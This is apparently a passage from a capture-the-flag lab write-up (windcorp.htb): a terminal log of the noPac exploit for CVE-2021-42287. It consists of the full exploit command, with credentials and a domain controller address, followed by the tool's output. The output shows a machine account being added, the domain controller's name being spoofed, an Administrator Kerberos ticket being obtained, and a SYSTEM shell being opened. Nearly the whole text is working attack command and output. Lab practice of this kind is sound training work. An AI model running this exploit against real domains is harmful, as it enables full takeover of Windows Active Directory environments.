CVE-2021-42287
python3 noPac.py windcorp.htb/localadmin:Secret123 -dc-ip 172.21.96.1 -dc-host earth -shell --impersonate Administrator
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target EARTH.windcorp.htb
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-3CI2AMTZI6D$"
[*] MachineAccount "WIN-3CI2AMTZI6D$" password = DEUT6Hq!kwBw
[*] Successfully added machine account WIN-3CI2AMTZI6D$ with password DEUT6Hq!kwBw.
[*] WIN-3CI2AMTZI6D$ object = CN=WIN-3CI2AMTZI6D,CN=Computers,DC=windcorp,DC=htb
[*] WIN-3CI2AMTZI6D$ sAMAccountName == EARTH
[*] Saving a DC's ticket in EARTH.ccache
[*] Reseting the machine account to WIN-3CI2AMTZI6D$
[*] Restored WIN-3CI2AMTZI6D$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_EARTH.windcorp.htb.ccache
[*] Attempting to del a computer with the name: WIN-3CI2AMTZI6D$
[-] Delete computer WIN-3CI2AMTZI6D$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
Last updated